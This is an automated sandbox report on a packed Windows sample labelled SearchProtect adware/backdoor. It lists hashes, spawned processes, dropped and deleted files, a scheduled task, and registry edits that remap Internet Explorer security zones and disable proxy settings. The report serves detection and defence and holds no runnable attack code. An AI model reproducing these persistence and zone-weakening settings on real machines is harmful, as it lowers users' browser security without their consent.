SearchProtectToolbar_50b2a4e2b0
not-a-virus:AdWare.Win32.Agent.aeph (Kaspersky), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 50b2a4e2b05f1a96cb606980e48cc21e
SHA1: 2a335a090157ddee7ce0dc3236bb1f8fade44e56
SHA256: 4f6017f9f7cacec1bbe0254f5f65be53532e8da7fb5421aef74469dcfb18e2f0
SSDeep: 6144:vrkT6Y0JQBkQRl7174NpNUM UHs CpgOUaNo8187yAMiC50RjBtC7QIh:vrkT63yRl1uqM gs zOUad87f2gjDuQ0
Size: 291648 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-03-12 10:51:45
Analyzed on: WindowsXP SP3 32-bit
Summary:
Backdoor. Malware that enables remote control of the victim's machine.
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
nshBF.exe:2008
putfu.exe:2928
sp-downloader.exe:1716
CltMngSvc.exe:1784
CltMngSvc.exe:1640
nsoBA.tmp:2012
cltmng.exe:996
usetup.exe:3420
cltmngui.exe:1296
rundll32.exe:3116
rundll32.exe:3052
%original file name%.exe:312
nsuB5.exe:516
nsuC3.exe:2608
UpdateSoftware.exe:3512
UpdateSoftware.exe:3456
The Backdoor injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process nshBF.exe:2008 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC1.tmp\inetc.dll (30 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC1.tmp\a.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC1.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyC0.tmp (0 bytes)
The process putfu.exe:2928 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\ProgramUpdater\Assistant.dll (264574 bytes)
%Program Files%\ProgramUpdater\AssistantSvc.dll (174 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)
The process sp-downloader.exe:1716 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuB5.exe (11736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB6.tmp (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\MiniStubUtils.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\downloadstub[1] (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB3.tmp (7189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spstub[1].exe (11736 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inet.txt1_M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\MiniStubUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuB5.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB2.tmp (0 bytes)
The process CltMngSvc.exe:1784 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\SearchProtect\Main\rep\SystemRepository.dat (9 bytes)
The process nsoBA.tmp:2012 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\SearchProtect\UI\dialogs\Images\close-win-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox_checked.png (360 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgUninstall.png (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\v.png (1 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC64.dll (103387 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC32.dll (287458 bytes)
%Program Files%\SearchProtect\EULA.txt (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.html (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-onclick.png (2 bytes)
%Program Files%\SearchProtect\Main\bin\uninstall.exe (33747 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuC3.exe (5520 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.css (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\menu-selected.png (3 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\x.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button2.png (886 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnSilver.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\main.js (10 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox.png (378 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnClose.png (933 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.js (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\json2.min.js (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgSettings.png (12 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPTool64.exe (50351 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\defaults.js (983 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez.png (256 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\close-win-over-click.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button.png (859 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg.png (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\defaults.js (1 bytes)
%Program Files%\SearchProtect\UI\bin\cltmngui.exe (100378 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\gray-bg.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\style.css (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgSettingsDS.png (9 bytes)
%Program Files%\SearchProtect\Main\bin\CltMngSvc.exe (96792 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\SPtool.dll (81046 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\cltmng.exe (170836 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg-uninstall.png (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\info-icon.png (424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\browsers32.sdb (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\inetc.dll (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.js (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\SPDialogAPI.js (3 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings.html (8 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgNotif.png (9 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.html (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.html (12 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\defaults.js (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.html (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Settings-icon.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg-with-logo.png (1552 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button-selected.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-Rollover.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.js (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\menu-rollover.png (1 bytes)
%Program Files%\SearchProtect\Main\rep\SystemRepository.dat (2221 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\text-field.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshBF.exe (5520 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.css (4 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox_def.png (274 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\icon-win.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\dialogUtils.js (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnBlue.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\button-bg.png (1 bytes)
%Program Files%\SearchProtect\Main\bin\SPTool.dll (81046 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\rep\UserRepository.dat (478 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\jquery.1.7.1.min.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\C2.tmp (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\defaults.js (1 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (6584 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-default.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszBE.tmp (649 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\System.dll (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez-selected.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CT3309297[1] (649 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.js (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\defaults.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqBC.tmp (698645 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (8560 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\SPtool.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgBB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp (0 bytes)
The process cltmng.exe:996 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\rep\UserSettings.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\rep\UserRepository.dat (1761 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\STG\Init_C2.tmp (0 bytes)
The process usetup.exe:3420 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\SoftSafe\UpdateSoftware\UpdateSoftware.exe (33792 bytes)
The process cltmngui.exe:1296 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\UI\rep\UIRepository.dat (1057 bytes)
The process %original file name%.exe:312 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\general_logo.bmp.tmp (808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.1.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe (33536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\general_logo[1].bmp (784 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin57DE.bat (84 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe (15 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.dat (14184 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\TsuDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3EFFE146.dat (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\2[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_2.ini (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_3[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sp-downloader[1].exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_3.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\50b2a4e2b05f1a96cb606980e48cc21e.log (3036232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\3[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_2[1].txt (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x86\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin3D45.bat (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tsu905D28F2.dll (2569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.3.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7306_appcompat.txt (214 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x64\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.2.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.sp-downloader.exe (5064 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.putfu.exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.usetup.exe (33536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6} (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.3.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.usetup.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_2.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3EFFE146.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\general_logo.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.1.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tsu905D28F2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.putfu.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Readme.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_3.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r2.monitorbox1[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin3D45.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x86\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\putfu.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\usetup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.sp-downloader.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\sp-downloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA459.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.2.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x64\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin57DE.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x86 (0 bytes)
The process nsuB5.exe:516 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\SPSetup[1].exe (433592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB8.tmp (10114 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBA.tmp (433592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\StubUtils.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBA.txt (70 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inet.txt2_M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8_{0EB51FE4-C139-4E92-9149-3A3205829D57} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\StubUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBA.txt (0 bytes)
The process nsuC3.exe:2608 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskC5.tmp\inetc.dll (30 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskC5.tmp\a.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC5.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuC4.tmp (0 bytes)
The process UpdateSoftware.exe:3456 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%WinDir%\Tasks\UpdateSoftware-S-3956077583.job (692 bytes)
%Documents and Settings%\All Users\Application Data\SoftSafe\UpdateSoftware\3956077583.ini (42494 bytes)
Registry activity
The process nshBF.exe:2008 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoC1.tmp\,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE C4 47 58 4B 6B EF 17 22 59 EB 24 D5 C4 58 D8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process putfu.exe:2928 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"27ddcf6f" = "///%"
"8b9e4cbc" = "V/////%%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c6c5dd44" = "V/////%%"
"e46c271e" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"InstallDate" = "20130802"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"6185d035" = "VP/h/CP/V//l////"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"340d3099" = "/P////%%"
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"NoModify" = "1"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c99a5f5c" = "///%"
"72758a5d" = "///%"
